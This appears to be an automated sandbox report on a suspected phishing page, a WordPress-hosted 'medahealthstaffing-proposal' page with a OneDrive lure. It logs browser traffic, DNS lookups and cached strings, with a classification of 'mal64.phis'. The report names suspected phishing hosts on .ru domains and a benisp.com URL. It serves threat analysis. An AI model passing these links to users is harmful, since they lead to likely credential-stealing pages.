      Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/754265710:1734707715:oBMT5532Ii6sPNFHOfKD9tGFk1HjF6gPP9GcopH_rJw/8f50c3606cea43b9/2dqSYWK0Dd5nXPHgk9S1pzxDycBFfDqXb6x9mdxK90c-1734709565-1.1.1.1-yzCAYJr.4lhCJtr.2hHLhx9zHosqDbEA0AI8gSibNVVtpRjzXyrmk_Bja6dIoTRH HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /occxEbMsaASlqNVkWEqyWydNFGHLKDHUVJNWWLPPADVXYAQO HTTP/1.1Host: gzxtjeiiyvg3rulexodnny9in4rl6d7aewewrgnjekg7beli8cgba6jfk4g.lpliwptf.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://oksu.ertanduzu.ruSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://oksu.ertanduzu.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /occxEbMsaASlqNVkWEqyWydNFGHLKDHUVJNWWLPPADVXYAQO HTTP/1.1Host: gzxtjeiiyvg3rulexodnny9in4rl6d7aewewrgnjekg7beli8cgba6jfk4g.lpliwptf.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: chromecache_119.2.drString found in binary or memory: <meta property="article:publisher" content="https://www.facebook.com/WordPresscom" /> equals www.facebook.com (Facebook)
      Source: global trafficDNS traffic detected: DNS query: www.google.com
      Source: global trafficDNS traffic detected: DNS query: dnearymedahealthstaffing.wordpress.com
      Source: global trafficDNS traffic detected: DNS query: s1.wp.com
      Source: global trafficDNS traffic detected: DNS query: s2.wp.com
      Source: global trafficDNS traffic detected: DNS query: s0.wp.com
      Source: global trafficDNS traffic detected: DNS query: wordpress.com
      Source: global trafficDNS traffic detected: DNS query: 0.gravatar.com
      Source: global trafficDNS traffic detected: DNS query: stats.wp.com
      Source: global trafficDNS traffic detected: DNS query: fonts.wp.com
      Source: global trafficDNS traffic detected: DNS query: pixel.wp.com
      Source: global trafficDNS traffic detected: DNS query: benisp.com
      Source: global trafficDNS traffic detected: DNS query: oksu.ertanduzu.ru
      Source: global trafficDNS traffic detected: DNS query: code.jquery.com
      Source: global trafficDNS traffic detected: DNS query: challenges.cloudflare.com
      Source: global trafficDNS traffic detected: DNS query: cdnjs.cloudflare.com
      Source: global trafficDNS traffic detected: DNS query: a.nel.cloudflare.com
      Source: global trafficDNS traffic detected: DNS query: gzxtjeiiyvg3rulexodnny9in4rl6d7aewewrgnjekg7beli8cgba6jfk4g.lpliwptf.ru
      Source: global trafficDNS traffic detected: DNS query: google.com
      Source: unknownHTTP traffic detected: POST /wp-admin/admin-ajax.php HTTP/1.1Host: dnearymedahealthstaffing.wordpress.comConnection: keep-aliveContent-Length: 44sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Content-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://dnearymedahealthstaffing.wordpress.comSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://dnearymedahealthstaffing.wordpress.com/medahealthstaffing-proposal/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: tk_ai=PfqOZc4jPU0a%2FtwKEstg1J5h; tk_qs=
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 20 Dec 2024 15:46:08 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=14400Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Kllo37THIMGIsEktpkFIODih6hoCQ%2BdE%2BD8mDLXcWZdqQnNvqMX3zHKDtnNmN2REPiY%2FNb7fy0luMhC7nDKEeOy4mdSqQXvAtrA4qt1hRU5OaHvhi9Nznasxy1arDQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Vary: Accept-Encodingalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1169&min_rtt=1125&rtt_var=352&sent=4&recv=8&lost=0&retrans=0&sent_bytes=2825&recv_bytes=2234&delivery_rate=2507042&cwnd=251&unsent_bytes=0&cid=a4112fac9ed84067&ts=435&x=0"CF-Cache-Status: MISSServer: cloudflareCF-RAY: 8f50c3716fc24249-EWRserver-timing: cfL4;desc="?proto=TCP&rtt=1613&min_rtt=1612&rtt_var=605&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2830&recv_bytes=1899&delivery_rate=1811414&cwnd=230&unsent_bytes=0&cid=5e5264ded2086e82&ts=10282&x=0"
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 20 Dec 2024 15:46:12 GMTContent-Type: application/jsonContent-Length: 7Connection: closecf-chl-out: eaa5nb0dMsfnbhbtORCzEtj9es6Vx9hWf1U=$bzLHb/935BOHJP/Wcache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Server: cloudflareCF-RAY: 8f50c389aa090f88-EWRalt-svc: h3=":443"; ma=86400
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 20 Dec 2024 15:46:19 GMTContent-Type: application/jsonContent-Length: 7Connection: closecache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0cf-chl-out: xKEjLBVImMe5FLCxo90hAAx0zrdYyQk1rOA=$P6pi8UQZ3qbrh0/DServer: cloudflareCF-RAY: 8f50c3b4d8a64376-EWRalt-svc: h3=":443"; ma=86400
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 20 Dec 2024 15:46:26 GMTContent-Type: application/jsonContent-Length: 7Connection: closecf-chl-out: 00rTIt+hhEn9yhzsnIxUwCRhsvWziWSVuQY=$3c7zozmNweKB2msYcache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Server: cloudflareCF-RAY: 8f50c3e21c130fa5-EWRalt-svc: h3=":443"; ma=86400
      Source: chromecache_119.2.drString found in binary or memory: https://benisp.com/dan/dann/dannn
      Source: chromecache_119.2.drString found in binary or memory: https://dnearymedahealthstaffing.wordpress.com
      Source: chromecache_119.2.drString found in binary or memory: https://dnearymedahealthstaffing.wordpress.com/comments/feed/
      Source: chromecache_119.2.drString found in binary or memory: https://dnearymedahealthstaffing.wordpress.com/feed/
      Source: chromecache_119.2.drString found in binary or memory: https://dnearymedahealthstaffing.wordpress.com/medahealthstaffing-proposal/
      Source: chromecache_119.2.drString found in binary or memory: https://dnearymedahealthstaffing.wordpress.com/medahealthstaffing-proposal/onedrive-for-business/
      Source: chromecache_119.2.drString found in binary or memory: https://dnearymedahealthstaffing.wordpress.com/osd.xml
      Source: chromecache_119.2.drString found in binary or memory: https://dnearymedahealthstaffing.wordpress.com/wp-admin/site-editor.php?postType=wp_template&#038;po
      Source: chromecache_119.2.drString found in binary or memory: https://dnearymedahealthstaffing.wordpress.com/wp-content/uploads/2024/12/onedrive-for-business.webp
      Source: chromecache_119.2.drString found in binary or memory: https://dnearymedahealthstaffing.wordpress.com/xmlrpc.php?rsd
      Source: chromecache_119.2.drString found in binary or memory: https://fonts.wp.com/s/epilogue/v17/O4ZCFGj5hxF0EhjimlIhqAYaY7EBcUSC-HA4T5_UqATfVHNU.woff2
      Source: chromecache_119.2.drString found in binary or memory: https://fonts.wp.com/s/epilogue/v17/O4ZCFGj5hxF0EhjimlIhqAYaY7EBcUSC-HAKT5_UqATfVHNU.woff2
      Source: chromecache_119.2.drString found in binary or memory: https://fonts.wp.com/s/epilogue/v17/O4ZCFGj5hxF0EhjimlIhqAYaY7EBcUSC-HAKTp_UqATfVHNU.woff2
      Source: chromecache_119.2.drString found in binary or memory: https://fonts.wp.com/s/epilogue/v17/O4ZCFGj5hxF0EhjimlIhqAYaY7EBcUSC-HBUT5_UqATfVHNU.woff2
      Source: chromecache_119.2.drString found in binary or memory: https://fonts.wp.com/s/epilogue/v17/O4ZCFGj5hxF0EhjimlIhqAYaY7EBcUSC-HCKSJ_UqATfVHNU.woff2
      Source: chromecache_119.2.drString found in binary or memory: https://fonts.wp.com/s/epilogue/v17/O4ZCFGj5hxF0EhjimlIhqAYaY7EBcUSC-HCKT5_UqATfVHNU.woff2
      Source: chromecache_119.2.drString found in binary or memory: https://fonts.wp.com/s/epilogue/v17/O4ZCFGj5hxF0EhjimlIhqAYaY7EBcUSC-HCjSJ_UqATfVHNU.woff2
      Source: chromecache_119.2.drString found in binary or memory: https://fonts.wp.com/s/epilogue/v17/O4ZCFGj5hxF0EhjimlIhqAYaY7EBcUSC-HDUSJ_UqATfVHNU.woff2
      Source: chromecache_119.2.drString found in binary or memory: https://fonts.wp.com/s/epilogue/v17/O4ZCFGj5hxF0EhjimlIhqAYaY7EBcUSC-HDtSJ_UqATfVHNU.woff2
      Source: chromecache_119.2.drString found in binary or memory: https://fonts.wp.com/s/epilogue/v17/O4ZMFGj5hxF0EhjimngomvnCCtqb30OX1zTiCZXVigHPVA.woff2
      Source: chromecache_119.2.drString found in binary or memory: https://fonts.wp.com/s/epilogue/v17/O4ZMFGj5hxF0EhjimngomvnCCtqb30OX7jTiCZXVigHPVA.woff2
      Source: chromecache_119.2.drString found in binary or memory: https://fonts.wp.com/s/epilogue/v17/O4ZMFGj5hxF0EhjimngomvnCCtqb30OXAjPiCZXVigHPVA.woff2
      Source: chromecache_119.2.drString found in binary or memory: https://fonts.wp.com/s/epilogue/v17/O4ZMFGj5hxF0EhjimngomvnCCtqb30OXMDLiCZXVigHPVA.woff2
      Source: chromecache_119.2.drString found in binary or memory: https://fonts.wp.com/s/epilogue/v17/O4ZMFGj5hxF0EhjimngomvnCCtqb30OXMDPiCZXVigHPVA.woff2
      Source: chromecache_119.2.drString found in binary or memory: https://fonts.wp.com/s/epilogue/v17/O4ZMFGj5hxF0EhjimngomvnCCtqb30OXbjPiCZXVigHPVA.woff2
      Source: chromecache_119.2.drString found in binary or memory: https://fonts.wp.com/s/epilogue/v17/O4ZMFGj5hxF0EhjimngomvnCCtqb30OXmTTiCZXVigHPVA.woff2
      Source: chromecache_119.2.drString found in binary or memory: https://fonts.wp.com/s/epilogue/v17/O4ZMFGj5hxF0EhjimngomvnCCtqb30OXsDPiCZXVigHPVA.woff2
      Source: chromecache_119.2.drString found in binary or memory: https://fonts.wp.com/s/epilogue/v17/O4ZMFGj5hxF0EhjimngomvnCCtqb30OXsDTiCZXVigHPVA.woff2
      Source: chromecache_97.2.drString found in binary or memory: https://github.com/Etcetera-Type-Co/Epilogue)Epilogue
      Source: chromecache_119.2.drString found in binary or memory: https://i0.wp.com/dnearymedahealthstaffing.wordpress.com/wp-content/uploads/2024/12/onedrive-for-bus
      Source: chromecache_119.2.drString found in binary or memory: https://pixel.wp.com/b.gif?v=noscript
      Source: chromecache_119.2.drString found in binary or memory: https://public-api.wordpress.com/oembed/?format=json&amp;url=https%3A%2F%2Fdnearymedahealthstaffing.
      Source: chromecache_119.2.drString found in binary or memory: https://public-api.wordpress.com/oembed/?format=xml&amp;url=https%3A%2F%2Fdnearymedahealthstaffing.w
      Source: chromecache_119.2.drString found in binary or memory: https://s0.wp.com/_static/??-eJx9jtEOgjAMRX/I0egk8mL8FDPmJB1ru7At/D4jAaM
      Source: chromecache_119.2.drString found in binary or memory: https://s0.wp.com/_static/??-eJytjEsKwzAMRC9UR01caLsoPYs/IjhVbGNZCbl9HUKgB
      Source: chromecache_119.2.drString found in binary or memory: https://s0.wp.com/wp-content/mu-plugins/actionbar/actionbar.css?v=20241015
      Source: chromecache_119.2.drString found in binary or memory: https://s0.wp.com/wp-content/mu-plugins/actionbar/actionbar.js?v=20231122
      Source: chromecache_119.2.drString found in binary or memory: https://s1.wp.com/_static/??-eJx9jcEOwjAMQ3
      Source: chromecache_119.2.drString found in binary or memory: https://s1.wp.com/_static/??-eJxdjNsKgzAQRH/IuBgpJQ
      Source: chromecache_119.2.drString found in binary or memory: https://s1.wp.com/_static/??/wp-content/mu-plugins/core-compat/wp-mediaelement.css
      Source: chromecache_119.2.drString found in binary or memory: https://s1.wp.com/i/favicon.ico
      Source: chromecache_119.2.drString found in binary or memory: https://s1.wp.com/opensearch.xml
      Source: chromecache_119.2.drString found in binary or memory: https://s1.wp.com/wp-content/js/rlt-proxy.js?m=1720530689i
      Source: chromecache_119.2.drString found in binary or memory: https://s2.wp.com/i/logo/wpcom-gray-white.png
      Source: chromecache_119.2.drString found in binary or memory: https://s2.wp.com/i/webclip.png
      Source: chromecache_119.2.drString found in binary or memory: https://s2.wp.com/wp-content/mu-plugins/gravatar-hovercards/wpgroho.js?m=1610363240i
      Source: chromecache_119.2.drString found in binary or memory: https://s2.wp.com/wp-content/themes/h4/global.css?m=1420737423i&cssminify=yes
      Source: chromecache_119.2.drString found in binary or memory: https://s2.wp.com/wp-content/themes/pub/fewer/assets/fonts/epilogue_300.ttf
      Source: chromecache_119.2.drString found in binary or memory: https://s2.wp.com/wp-content/themes/pub/fewer/assets/fonts/epilogue_300italic.ttf
      Source: chromecache_119.2.drString found in binary or memory: https://s2.wp.com/wp-content/themes/pub/fewer/assets/fonts/epilogue_500.ttf
      Source: chromecache_119.2.drString found in binary or memory: https://s2.wp.com/wp-content/themes/pub/fewer/assets/fonts/epilogue_500italic.ttf
      Source: chromecache_119.2.drString found in binary or memory: https://schema.org/ImageGallery
      Source: chromecache_97.2.drString found in binary or memory: https://scripts.sil.org/OFLhttps://scripts.sil.org/OFLEpilogueLightEpilogueRomanWeightItalicRoman
      Source: chromecache_119.2.drString found in binary or memory: https://subscribe.wordpress.com
      Source: chromecache_119.2.drString found in binary or memory: https://subscribe.wordpress.com/
      Source: chromecache_119.2.drString found in binary or memory: https://wordpress.com/abuse/?report_url=https://dnearymedahealthstaffing.wordpress.com/medahealthsta
      Source: chromecache_119.2.drString found in binary or memory: https://wordpress.com/log-in?redirect_to=https%3A%2F%2Fdnearymedahealthstaffing.wordpress.com%2Fmeda
      Source: chromecache_119.2.drString found in binary or memory: https://wordpress.com/post
      Source: chromecache_95.2.dr, chromecache_104.2.drString found in binary or memory: https://wordpress.com/public.api/connect/?action=request&service=wordpress
      Source: chromecache_95.2.dr, chromecache_104.2.drString found in binary or memory: https://wordpress.com/public.api/connect/?iframe=true
      Source: chromecache_119.2.drString found in binary or memory: https://wordpress.com/read/blogs/240074490/posts/22
      Source: chromecache_119.2.drString found in binary or memory: https://wordpress.com/start/
      Source: chromecache_119.2.drString found in binary or memory: https://wordpress.com/start/?ref=marketing_bar
      Source: chromecache_119.2.drString found in binary or memory: https://wordpress.org
      Source: chromecache_119.2.drString found in binary or memory: https://wp.me/Pgfklc-m
      Source: chromecache_97.2.drString found in binary or memory: https://www.etceteratype.cohttps://www.madebytyler.comThis
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
      Source: unknownNetwork traffic detected: HTTP traffic on port 49890 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49861
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49860
      Source: unknownNetwork traffic detected: HTTP traffic on port 49800 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49898 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49875 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49826 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49906 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49854
      Source: unknownNetwork traffic detected: HTTP traffic on port 49900 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49853
      Source: unknownNetwork traffic detected: HTTP traffic on port 49946 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49915 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49806 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49823 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49861 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49869 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49966
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
      Source: unknownNetwork traffic detected: HTTP traffic on port 49674 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49960
      Source: unknownNetwork traffic detected: HTTP traffic on port 49966 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49831 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49921 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49954
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49799
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49953
      Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49798
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49831
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
      Source: unknownNetwork traffic detected: HTTP traffic on port 49822 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49853 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49808 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49884 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
      Source: unknownNetwork traffic detected: HTTP traffic on port 49907 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49941 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49948
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49826
      Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49946
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49824
      Source: unknownNetwork traffic detected: HTTP traffic on port 49867 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49823
      Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49822
      Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49787
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49941
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
      Source: unknownNetwork traffic detected: HTTP traffic on port 49676 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
      Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49799 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49810 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49816
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49815
      Source: unknownNetwork traffic detected: HTTP traffic on port 49868 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49899
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49810
      Source: unknownNetwork traffic detected: HTTP traffic on port 49816 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49898
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49897
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49891
      Source: unknownNetwork traffic detected: HTTP traffic on port 49954 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49890
      Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49671 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49897 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49794 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49876 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49960 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49809
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49808
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49928
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49806
      Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49801
      Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49800
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49921
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
      Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49783 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49884
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49883
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
      Source: unknownNetwork traffic detected: HTTP traffic on port 49928 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49953 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49877 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49854 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49914 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49908 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49824 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49809 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49860 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49883 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49915
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49914
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
      Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49877
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49876
      Source: unknownNetwork traffic detected: HTTP traffic on port 49948 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49875
      Source: unknownNetwork traffic detected: HTTP traffic on port 49891 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
      Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
      Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49899 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49908
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49907
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49906
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49869
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49868
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49867
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49900
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
      Source: classification engineClassification label: mal64.phis.win@25/104@62/16
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome AppsJump to behavior
      Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2316 --field-trial-handle=2232,i,223269559508194267,12373527596569919649,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
      Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://dnearymedahealthstaffing.wordpress.com/medahealthstaffing-proposal/"
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2316 --field-trial-handle=2232,i,223269559508194267,12373527596569919649,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
